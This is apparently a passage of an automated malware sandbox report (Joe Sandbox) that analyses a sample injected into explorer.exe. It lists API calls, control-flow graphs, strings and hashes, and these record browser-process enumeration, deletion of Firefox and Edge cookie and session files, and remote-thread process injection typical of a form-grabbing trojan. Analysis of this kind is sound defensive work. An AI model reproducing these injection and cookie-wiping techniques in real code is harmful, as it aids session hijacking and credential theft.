                                                                                                                                                                                                              • Opcode ID: 78a0c505d9bb359c9ff8636396db3ccffa851cf8735e0e0620cfa3f33bcdcea4
                                                                                                                                                                                                              • Instruction ID: 0d83295f89c4609cb8ae80efdc55b72e033f516ac6c7eda428e6b1fe414f62bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 78a0c505d9bb359c9ff8636396db3ccffa851cf8735e0e0620cfa3f33bcdcea4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5F11C26038139622F538376A1CB2FAF654ECF95B9DF150114F20AAB6C0CEC49E0159A9

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CA3C1F
                                                                                                                                                                                                                • Part of subcall function 02CA1235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02CA123F
                                                                                                                                                                                                                • Part of subcall function 02CA1235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,02CA3C33), ref: 02CA1251
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA3C69
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 02CA3C88
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 02CA3CA1
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 02CA3CB1
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02CA3CC1
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 02CA3D12
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02CA3D68
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02CA3D77
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 02CA3D82
                                                                                                                                                                                                                • Part of subcall function 02CA1141: lstrlen.KERNEL32(?,?,?,00000000,?,02CA29DD,00000001), ref: 02CA1150
                                                                                                                                                                                                                • Part of subcall function 02CA1141: lstrlen.KERNEL32(:method POST,?,00000000,?,02CA29DD,00000001), ref: 02CA1155
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                                                                                                                                                                                              • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                                                                                                                                                                                              • API String ID: 2509890648-2554907557
                                                                                                                                                                                                              • Opcode ID: 448845339368bb5d6de2750a9ec7967d8aa833805a3040239fac4b5172c55f6e
                                                                                                                                                                                                              • Instruction ID: d6fb6f3a2b612e399ce96f42790702abf747f504c87c18cd575306385a8cb763
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 448845339368bb5d6de2750a9ec7967d8aa833805a3040239fac4b5172c55f6e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CD411830A407439BDB28AB74DC75B7F73AEAF8474CF084B28F85693180DB60D9459AE5

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA1374
                                                                                                                                                                                                                • Part of subcall function 02CA1363: Process32First.KERNEL32(00000000,?), ref: 02CA1393
                                                                                                                                                                                                                • Part of subcall function 02CA1363: CloseHandle.KERNELBASE(00000000), ref: 02CA13CB
                                                                                                                                                                                                                • Part of subcall function 02CA1363: lstrcmpiA.KERNEL32(?), ref: 02CA13A3
                                                                                                                                                                                                                • Part of subcall function 02CA1363: Process32Next.KERNEL32(00000000,00000128), ref: 02CA13C0
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA35FA
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA3613
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA3623
                                                                                                                                                                                                              • wsprintfW.USER32 ref: 02CA3644
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA150D
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA151C
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA1557
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02CA156A
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: DeleteFileW.KERNELBASE(00000000), ref: 02CA1571
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA1584
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindClose.KERNELBASE(00000000), ref: 02CA158F
                                                                                                                                                                                                                • Part of subcall function 02CA1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
                                                                                                                                                                                                                • Part of subcall function 02CA1011: RtlFreeHeap.NTDLL(00000000), ref: 02CA1027
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA3672
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,02CA4614,?,00000000,?,02CA382F,?,02CA3C53,00000001), ref: 02CA3682
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                                                                                                                                                                                              • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                                                                                                                                                                                              • API String ID: 2436889709-3669280581
                                                                                                                                                                                                              • Opcode ID: 42fc25a700c462b55ebe8695b2a7c7de0f6dfe9da86b82893b35286ab029bc22
                                                                                                                                                                                                              • Instruction ID: bd739cf5ea6d4919c688fe7994ed5490d6a7e1d3019e72e2d1286e77eb6c1e45
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 42fc25a700c462b55ebe8695b2a7c7de0f6dfe9da86b82893b35286ab029bc22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB11707078024267F73C27695CBAF7F265ADBD5B5EF190128B70ABB2C0DED4080166A9

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA1374
                                                                                                                                                                                                                • Part of subcall function 02CA1363: Process32First.KERNEL32(00000000,?), ref: 02CA1393
                                                                                                                                                                                                                • Part of subcall function 02CA1363: CloseHandle.KERNELBASE(00000000), ref: 02CA13CB
                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8,?,00000000,?,02CA3834,?,02CA3C53,00000001), ref: 02CA36B3
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,02CA3834,?,02CA3C53,00000001), ref: 02CA36CC
                                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\,?,00000000,?,02CA3834,?,02CA3C53,00000001), ref: 02CA36DC
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA150D
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 02CA151C
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: wsprintfW.USER32 ref: 02CA1557
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 02CA156A
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: DeleteFileW.KERNELBASE(00000000), ref: 02CA1571
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 02CA1584
                                                                                                                                                                                                                • Part of subcall function 02CA14D8: FindClose.KERNELBASE(00000000), ref: 02CA158F
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                                                                                                                                                                                              • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                                                                                                                                                                                              • API String ID: 2731919298-637609321
                                                                                                                                                                                                              • Opcode ID: 6469a725e2c72339bbcee4b374b0ba80778ff13d3e2e8eb26970755c055b7d64
                                                                                                                                                                                                              • Instruction ID: 55d64ed24c3827122647817df55b9826cfe22de90afe1878c394a03711307844
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6469a725e2c72339bbcee4b374b0ba80778ff13d3e2e8eb26970755c055b7d64
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5F0A75174115273973C376E5C3DE6F295ECBD6B5EB04011CF10E93180CED4090166B9

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 279 2ca1363-2ca137f CreateToolhelp32Snapshot 280 2ca13d1-2ca13d6 279->280 281 2ca1381-2ca1399 Process32First 279->281 282 2ca13c6-2ca13c8 281->282 283 2ca13ca-2ca13cb CloseHandle 282->283 284 2ca139b-2ca13ab lstrcmpiA 282->284 283->280 285 2ca13b8-2ca13c0 Process32Next 284->285 286 2ca13ad-2ca13b3 call 2ca133f 284->286 285->282 286->285
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CA1374
                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 02CA1393
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?), ref: 02CA13A3
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 02CA13C0
                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 02CA13CB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 868014591-0
                                                                                                                                                                                                              • Opcode ID: b7a1409cc142021b3d06f27964059da7eb61c91e54f57b79ec948b539b4fc309
                                                                                                                                                                                                              • Instruction ID: b3f08d83ae0869c64c9f62c0fdbdf59092c07cef7f5126901276a4617f371858
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b7a1409cc142021b3d06f27964059da7eb61c91e54f57b79ec948b539b4fc309
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8F0C8319421249BDB345E659C19BDE77BCEB49329F0006A0E94DD3180EBF44A648AD0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 309 2ca1235-2ca1247 OpenFileMappingA 310 2ca1249-2ca1259 MapViewOfFile 309->310 311 2ca125c-2ca1260 309->311 310->311
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 02CA123F
                                                                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,02CA3C33), ref: 02CA1251
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3439327939-0
                                                                                                                                                                                                              • Opcode ID: b04cc3462836f2d9fb8662367382e85ef2cbc6c152caa933a9d691eb18c377ca
                                                                                                                                                                                                              • Instruction ID: bfb41037fa8b41ff6d478ed65b77446b1394c0396f3ff42feb8926ae06df90aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b04cc3462836f2d9fb8662367382e85ef2cbc6c152caa933a9d691eb18c377ca
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F1D0E222B45221ABE3341AAA6C0DF836E9DDFC6AE5B064225B509D2140D6A08820C6F0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 317 2ca1011-2ca101b call 2ca1274 320 2ca102d-2ca102e 317->320 321 2ca101d-2ca1027 GetProcessHeap RtlFreeHeap 317->321 321->320
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CA1281
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(00000000), ref: 02CA1027
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$FreeProcessQueryVirtual
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2580854192-0
                                                                                                                                                                                                              • Opcode ID: d5275c81c5b332737c42391a96f7d632c358577938d3f0c9f57a7e6884756f9f
                                                                                                                                                                                                              • Instruction ID: b68a152b292211c5b4e61e69594c1ad370615a15b4cda1f174a235aa7c37c968
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5275c81c5b332737c42391a96f7d632c358577938d3f0c9f57a7e6884756f9f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DBC08C3184426096CB3427A0380EBC62A089F0921DF090A41B508A3041CBE088249AE0

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 322 2ca15a9-2ca15bd SetFileAttributesW DeleteFileW
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFileAttributesW.KERNELBASE(00000000,00000020,00000000,02CA168B), ref: 02CA15AF
                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(00000000), ref: 02CA15B6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$AttributesDelete
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2910425767-0
                                                                                                                                                                                                              • Opcode ID: 431dfcbcb615d007891a5ff08a3e3ca03bd755dc6be2efc4fd424a795e1dbd9b
                                                                                                                                                                                                              • Instruction ID: 295a5553b4fd1313ccd5d9ede99a3f11079b7bd96c5a6c34a2eb61570d505f4b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 431dfcbcb615d007891a5ff08a3e3ca03bd755dc6be2efc4fd424a795e1dbd9b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7B09232882534AFD6292B14B80EBCE2658EF0A215B050652F201920408BD41E1296EA

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 323 2ca1000-2ca1010 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                              • Opcode ID: e9898b40b4de83173ec4145b64af3af976179f75ec1bcfb1eb87e797c92866f3
                                                                                                                                                                                                              • Instruction ID: b6e33d9e49125b0a9f4b91021f3f42440d0fe8b4a1a89cb0eea5afa7ae852a02
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e9898b40b4de83173ec4145b64af3af976179f75ec1bcfb1eb87e797c92866f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6BA002B5D901105BDE5857A4B90FF153528B744749F148A44714687040DBE454349761
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02CA1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CA1281
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,74DEE800), ref: 02CA201A
                                                                                                                                                                                                              • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 02CA2055
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 02CA20E5
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,02CA50A0,00000016), ref: 02CA210C
                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 02CA2134
                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 02CA2144
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 02CA215E
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CA2166
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA2174
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8), ref: 02CA217B
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 02CA2191
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 02CA2198
                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02CA21AE
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02CA21D8
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02CA21EB
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA21F2
                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 02CA21F9
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 02CA220D
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CA2224
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA2231
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02CA2237
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02CA223D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA2240
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                                                                              • String ID: atan$ntdll$opera_shared_counter
                                                                                                                                                                                                              • API String ID: 1066286714-2737717697
                                                                                                                                                                                                              • Opcode ID: 1eb317f600dde710df04b1bc3647639cbf9cce4199ce8508b83ec7358aead22f
                                                                                                                                                                                                              • Instruction ID: 8cf1060b910333bbb496b1b185098900e9287dd6cc0c656f2b2eb5c2d192cdc4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eb317f600dde710df04b1bc3647639cbf9cce4199ce8508b83ec7358aead22f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1B61E131A44316AFD3248F61CC85E6B7BEDEF88758F040B29F949D3241DBB4D9048BA2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 02CA11A9
                                                                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 02CA11C1
                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 02CA11C9
                                                                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 02CA11D4
                                                                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 02CA11EE
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CA1205
                                                                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 02CA121E
                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02CA1228
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                                                                              • String ID: %02X
                                                                                                                                                                                                              • API String ID: 3341110664-436463671
                                                                                                                                                                                                              • Opcode ID: a53f8c713e0aae5ed768969c270fde82e74a83fcfe9474b81c44c001e55ed005
                                                                                                                                                                                                              • Instruction ID: 08f0970335243534446b46f2218d1887773eb1e7ece0ec5b40269bc58023515b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a53f8c713e0aae5ed768969c270fde82e74a83fcfe9474b81c44c001e55ed005
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FD113071D4010CBFEB259F95EC49FAEBB7CEB84309F104565F605E2140D7B14E11ABA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 02CA16D9
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 02CA16E1
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 02CA16F1
                                                                                                                                                                                                              • Thread32First.KERNEL32(00000000,0000001C), ref: 02CA16FF
                                                                                                                                                                                                              • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 02CA171E
                                                                                                                                                                                                              • SuspendThread.KERNEL32(00000000), ref: 02CA172E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA173D
                                                                                                                                                                                                              • Thread32Next.KERNEL32(00000000,0000001C), ref: 02CA174D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CA1758
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1467098526-0
                                                                                                                                                                                                              • Opcode ID: cadfd5f7e02faaeff4f848d345001d8bc8f90d92be49b831c08500b5062819c2
                                                                                                                                                                                                              • Instruction ID: 2e8d7c7cf8b643d2918159c521bd39c765615a6669490a5a95adb609c3cf8f97
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cadfd5f7e02faaeff4f848d345001d8bc8f90d92be49b831c08500b5062819c2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D11C232848201DFD3259FA09849B6F7BE8EF85709F040919F689C3140C7B08559EBE3
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,02CA2EC5), ref: 02CA2E27
                                                                                                                                                                                                                • Part of subcall function 02CA1000: GetProcessHeap.KERNEL32(00000008,00000208,02CA1418), ref: 02CA1003
                                                                                                                                                                                                                • Part of subcall function 02CA1000: RtlAllocateHeap.NTDLL(00000000), ref: 02CA100A
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 02CA2E52
                                                                                                                                                                                                              • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 02CA2E7F
                                                                                                                                                                                                              • StrStrIW.SHLWAPI(?,NetworkService), ref: 02CA2E92
                                                                                                                                                                                                                • Part of subcall function 02CA1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,02CA14CB), ref: 02CA1020
                                                                                                                                                                                                                • Part of subcall function 02CA1011: RtlFreeHeap.NTDLL(00000000), ref: 02CA1027
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000014.00000002.2893263231.0000000002CA1000.00000040.80000000.00040000.00000000.sdmp, Offset: 02CA1000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_20_2_2ca1000_explorer.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                                                                                                                                                                                              • String ID: NetworkService
                                                                                                                                                                                                              • API String ID: 1656241333-2019834739
                                                                                                                                                                                                              • Opcode ID: a325c1cb662c89e20bc298591119ff439962c79c4e796f1710cf704e3a530892
                                                                                                                                                                                                              • Instruction ID: 534f66c828980a66467677fba8b792d4c1708ef4610add59f32e201ff6f9d8ad
